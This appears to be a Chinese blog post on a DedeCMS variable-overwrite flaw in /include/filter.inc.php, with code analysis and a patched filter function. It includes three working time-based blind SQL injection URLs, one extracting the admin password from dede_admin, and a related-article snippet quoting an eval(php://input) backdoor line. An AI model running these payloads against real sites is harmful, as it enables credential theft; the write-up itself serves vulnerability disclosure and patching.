include/filter.inc.php,dedecms /include/filter.inc.php 变量覆盖注入漏洞及解决方案

最新推荐文章于 2022-07-11 07:37:00 发布
最新推荐文章于 2022-07-11 07:37:00 发布
阅读量371 收藏
点赞数
文章标签: include/filter.inc.php

1. 漏洞描述

filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,所以可以覆盖系统变量

1. 在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤

2. 经过common.inc.php

3. 经过filter.inc.php//重新获得闭合攻击性

2. 漏洞触发条件

1. 程序不允许创建cfg_开头的变量,依靠这样来防御系统变量未初始化漏洞

2. common.inc.php文件的漏洞我们创建了系统变量就可以触发此类漏洞,但是有的系统变量已经初始化了,而且是在common.inc.php文件foreach循环注册变量之后,就是说我们能创建,但是没法覆盖

3. 但是filter.inc.php这个文件又进行了一次foreach循环也就是二次创建。所以如果包含了filter.inc.php文件我们就可以覆盖系统变量

4. 在/member目录的大部分文件都包含这么一个文件/member/config.php,这个文件的前两句就是require_once(dirname(__FILE__).’/../include/common.inc.php’);require_once(DEDEINC.’/filter.inc.php’);//就是说/member目录的大部分文件都受此漏洞影响可以覆盖系统变量

第一步:

http://127.0.0.1/dedecms5.5/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select pwd from dede_admin),1,1)='f',sleep(5),0)) -- - @`'`

第二步:

http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select 1),1,1)='1',sleep(5),0)) -- - @`'`

第三步:

http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select user()),1,1)='r',sleep(5),0)) -- - @`'`

3. 漏洞代码分析

/include/filter.inc.phpfunction _FilterAll($fk,&$svar){

global $cfg_notallowstr,$cfg_replacestr;

if( is_array($svar) ){

foreach($svar as $_k => $_v){

$svar[$_k] = _FilterAll($fk,$_v);

}

}else{

if($cfg_notallowstr!='' && eregi($cfg_notallowstr,$svar)){

ShowMsg(" $fk has not allow words!",'-1');

exit();

}

if($cfg_replacestr!=''){

$svar = eregi_replace($cfg_replacestr,"***",$svar);

}

}

//未对外部提交的数据进行有效转义,重新造成本地变量注入

return $svar;

}

foreach(Array('_GET','_POST','_COOKIE') as $_request){

foreach($$_request as $_k => $_v){

${$_k} = _FilterAll($_k,$_v);

}

}

4. 防御方法

/include/filter.inc.phpfunction _FilterAll($fk, &$svar){

global $cfg_notallowstr,$cfg_replacestr;

if( is_array($svar) ){

foreach($svar as $_k => $_v){

$svar[$_k] = _FilterAll($fk,$_v);

}

}else{

if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar)){

ShowMsg(" $fk has not allow words!",'-1');

exit();

}

if($cfg_replacestr!=''){

$svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);

}

}

/* 进行有效转义 */

return addslashes($svar);

}

/* 对_GET,_POST,_COOKIE进行过滤 */

foreach(Array('_GET','_POST','_COOKIE') as $_request){

foreach($$_request as $_k => $_v){

${$_k} = _FilterAll($_k,$_v);

}

}

5.补丁下载:

php://filter(文件包含漏洞利用)及php://input
Sea_Sand息禅
11-17 5894
1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: string.rot13 对字符串执行ROT13转换 string.toupper转换为大写 string.tolower 转换为小写 string.strip_tags去除...
dedecmsv5.7sp1 文件包含和变量覆盖漏洞
小饼干的博客
06-28 1042
环境搭建:使用phpstudy,phpstudy版本2016,PHP版本5.4.45,mysql版本5.5.53 dedecms版本5.7 sp1 utf-8版 环境搭建好以后安装dedecms,安装完成以后访问一下 存在漏洞的地方在install/index.php文件中 在29到33行中存在变量覆盖,这段代码的大概意思是依次对_GET,_POST,_COOKIE进行键值分离 例如:_GET传入的参数是id=1,name=nfnf,在第一个foreach中先遍历_GET,此时$_request变为$_g
filter.inc.php
01-16
filter.inc.php
织梦Dedecms系统可疑文件include/filter.inc.php扫描出漏洞,该如何解决?
weixin_34417814的博客
05-04 921
今天在做网站监察的时候,发现网站出了一个问题,在对网站做木马监测的时候,扫描出一个可疑文件:/include/filter.inc.php,建议删除,但仔细检查后,发现此文件是织梦(Dedecms)系统自带的问题,那么,我们该如何解决呢? 漏洞描述:dedecmsfilter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,可以覆盖系统变量从而导致注入漏...
dedecms /include/filter.inc.php Local Variable Overriding
weixin_34148340的博客
05-22 117
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,所以可以覆盖系统变量 1. 在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤 xxx....
php input 漏洞,php://input,php://filter,data URI schema的那些事
weixin_36400833的博客
03-11 1739
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用...
PHP 学习路线
墨鱼菜鸡
07-11 3529
PHP 官网文档(中文):https://www.php.net/manual/zh/langref.php ThinkPhp (官方手册、入门教程):https://sites.thinkphp.cn/1556331 ​W3School PHP 教程:http://www.w3school.com.cn/php/index.asp w3cschool...
PHP相关漏洞------学习笔记
tell_me_404的博客
03-07 651
一、PHP文件包含漏洞 1、什么是PHP漏洞 程序开发人员一般会把重复使用的函数写到一个单个文件中,在需要使用某个函数的时候直接调用此文件,二无需再次编写,这种文件调用的过程一般被称为文件包含。开发人员为使代码变得更灵活,将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,导致客户端可以嗲用一个恶意文件,造成文件包含漏洞。几乎所有的脚本语言都会提供文件包含的功能,单文件包含漏洞在PH...
dedecms织梦安全设置漏洞修复大全
sqk210的博客
10-26 1472
  删除member special install 打开plus文件夹除了下面几个文件 其他删除 Img 文件夹,这个是主要是CSS样式在里面,所以保留,如果删除了,会造成发布文章时界面有点乱,所以要保留ad_js.php 这个文件时广告位,因为有些模板用到了后台调用广告位,如果你不确定,建议保留 Diy.php 这个是留言系统,有些模板上有用户在线留言功能,用到的就是这个,如果你不确定,...
DEDE 5.7中各函数所在的文件和位置-方便二次开发
云度
08-12 1098
/include/taglib/tag.lib.php 2 //function GetTags() /include/payment/yeepay.php 415 function log_result() /dede/stepselect_main.php 204 function __addenum_save() /dede/stepselect_main.php 147 functio...
漏洞名称:DedeCms全局变量覆盖漏洞
weixin_34007020的博客
01-16 298
漏洞地址:/include/common.inc.php 临时解决方案: 在/include/common.inc.php中 找到注册变量的代码 foreach(Array('_GET','_POST','_COOKIE')as$_request){foreach($$_requestas$_k=>$_v)${$_k}=_RunMagicQu...
php变量覆盖漏洞,DEDECMS全局变量覆盖漏洞科普
weixin_31236309的博客
03-11 259
DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微科普下这个漏洞,大牛们可以完全无视:一. 了解PHP超级全局变量下面是PHP的超级全局变量,可以了解一个特性,全是数组。$GLOBALS, 所有全局变量数组$_SERVER, 服务器环境变量数组$_GET,通过GET方法传递给...
php变量覆盖漏洞,dedecms变量覆盖漏洞导致注入漏洞怎么办
weixin_35653597的博客
03-11 116
dedecms变量覆盖漏洞导致注入漏洞怎么办?dedecms变量覆盖漏洞导致注入漏洞推荐学习:织梦cms文件是:include/filter.inc.php防御方法/include/filter.inc.php/*** 过滤不相关内容** @access public* @param string $fk 过滤键* @param string $svar 过滤值* ...
php覆盖的解释,DEDECMS全局变量覆盖漏洞详解
weixin_36380063的博客
03-10 165
DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微介绍下这个漏洞,大牛们可以完全无视:一. 了解PHP超级全局变量下面是PHP的超级全局变量,可以了解一个特性,全是数组。$GLOBALS, 所有全局变量数组$_SERVER, 服务器环境变量数组$_GET,通过GET方法传递给...
php-filter的进阶利用
unexpectedthing的博客
10-09 750
文章目录前言php://filterfilter绕过死亡die,死亡之exitphp://inputzip://,bzip2://,zlib://data协议总结 前言 本文重点是在php://filter协议中,其他协议只是回忆下 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件 函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有
织梦 include php文件,织梦Dedecms系统可疑文件include/filter.inc.php扫描出漏洞,该如何解决?...
weixin_36106506的博客
03-11 417
今天在做网站监察的时候,发现网站出了一个问题,在对网站做木马监测的时候,扫描出一个可疑文件:/include/filter.inc.php,建议删除,但仔细检查后,发现此文件是织梦(Dedecms)系统自带的问题,那么,我们该如何解决呢?漏洞描述:dedecmsfilter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,可以覆盖系统变量从而导致注入漏洞漏洞路径:/...
织梦dedecms漏洞修复大全含任意文件上传漏洞注入漏洞
zxy840552216的博客
07-12 1351
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天就为大家讲解一下如何修复任意文件上传漏洞注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialog/select_soft_post.php;SQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php...
dedecms注入漏洞(edit.inc.php
L_melody的博客
01-19 2695
文件:edit.inc.php 路径:.../plus/guestbook/edit.inc.php 解决方案: 查找文件位置:/plus/guestbook/edit.inc.php ,大概在55行左右,找到: $dsql->ExecuteNoneQuery("UPDATE `dede_guestbook` SET `msg`='$msg', `posttime`='".tim...
织梦dedecms上传漏洞uploadsafe.inc.php修复方法
qq_31763129的博客
08-18 1731
dedecms上传漏洞uploadsafe.inc.php,这里直接给出修复漏洞的方法,希望大家可以多学习。         今天分享的漏洞是一个关于织梦dedecms上传漏洞修复方法,主要是文件/include/uploadsafe.inc.php。         有2个地方:         1、搜索 ${$_key.'_size'} = @filesize($$_key);  ...
在f90中,#include "bspline3/gx.inc"什么意思
最新发布
05-31
在 Fortran 90 中,没有像 C++ 中的 #include 预处理指令,因此在 Fortran 90 代码中出现 #include "bspline3/gx.inc" 是不合法的。这段代码只能在 C++ 中使用,用于将指定文件中的内容包含到当前文件中。 在 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值